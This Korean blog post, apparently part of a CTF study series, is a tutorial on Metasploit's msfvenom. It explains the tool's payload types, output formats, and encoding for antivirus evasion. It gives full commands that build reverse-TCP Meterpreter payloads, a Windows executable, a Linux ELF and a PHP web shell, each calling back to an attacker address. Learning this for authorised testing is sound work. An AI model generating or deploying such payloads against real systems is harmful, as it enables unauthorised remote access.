msfvenom

agnusdei·2025년 9월 12일

CTF

목록 보기
113/185

msfvenomMetasploit Framework(메타스플로잇 프레임워크)에 포함된 도구로, 보안 전문가(특히 침투 테스트 전문가)가 **페이로드(payload)**를 생성하고 인코딩하는 데 사용하는 유틸리티입니다.


🔹 msfvenom 개요

  • 이름 의미

    • msf → Metasploit Framework
    • venom → "독"이라는 의미에서 착안 → 공격에 사용할 페이로드를 만들어내는 도구
  • 역할:
    침투 테스트나 모의 해킹에서 사용할 악성 실행 파일, 스크립트, 쉘코드 등을 생성할 수 있음.


🔹 주요 기능

  1. 페이로드 생성 (Payload Generation)

    • 역방향 쉘(reverse shell)
    • 바인드 쉘(bind shell)
    • Meterpreter 세션 등 다양한 형태의 페이로드를 생성 가능
  2. 멀티플랫폼 지원

    • Windows 실행 파일(.exe)
    • Linux ELF(.elf)
    • Android APK(.apk)
    • macOS Mach-O(.macho)
    • 웹 스크립트 (PHP, ASP, JSP 등)
  3. 인코딩 (Encoding) 지원

    • 안티바이러스 탐지를 회피하기 위해 쉘코드를 인코딩할 수 있음.
    • 예: x86/shikata_ga_nai 같은 인코더 사용
  4. 출력 포맷 다양

    • 바이너리 파일, C 코드, Python 코드, Ruby 코드, PowerShell 스크립트 등 다양한 형식으로 출력 가능

🔹 기본 사용법

msfvenom -p <payload> LHOST=<공격자 IP> LPORT=<포트> -f <포맷> -o <출력파일>
  • -p : 사용할 페이로드(payload) 선택
  • LHOST : 리스너 호스트(공격자 IP 주소)
  • LPORT : 리스너 포트
  • -f : 출력 포맷(format) 지정 (exe, elf, apk, c, python 등)
  • -o : 출력 파일 지정

🔹 예시

1. Windows용 Reverse TCP Shell 생성

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe

➡️ shell.exe 실행 시 공격자에게 Meterpreter 세션이 연결됨.

2. Linux ELF Payload 생성

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf -o shell.elf

3. PHP 웹쉘 생성

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw -o shell.php

🔹 보안 관점에서 주의할 점

  • 합법적인 목적 (예: 교육, 연구, 본인 시스템의 보안 점검) 에서만 사용해야 함.
  • 실제 운영 환경이나 타인의 시스템에 허가 없이 사용하면 불법 행위에 해당.
  • 안티바이러스(AV, AntiVirus) 탐지 우회를 위한 인코딩 기능은 방어 기술 연구 목적으로만 권장됨.

👉 정리하자면, msfvenom은 침투 테스트 전문가가 다양한 환경에 맞는 페이로드를 빠르게 생성하고 커스터마이즈할 수 있게 해주는 강력한 도구입니다.


profile
DevSecOps, Pentest, Cloud(OpenStack), Develop, Data Engineering, AI-Agent

0개의 댓글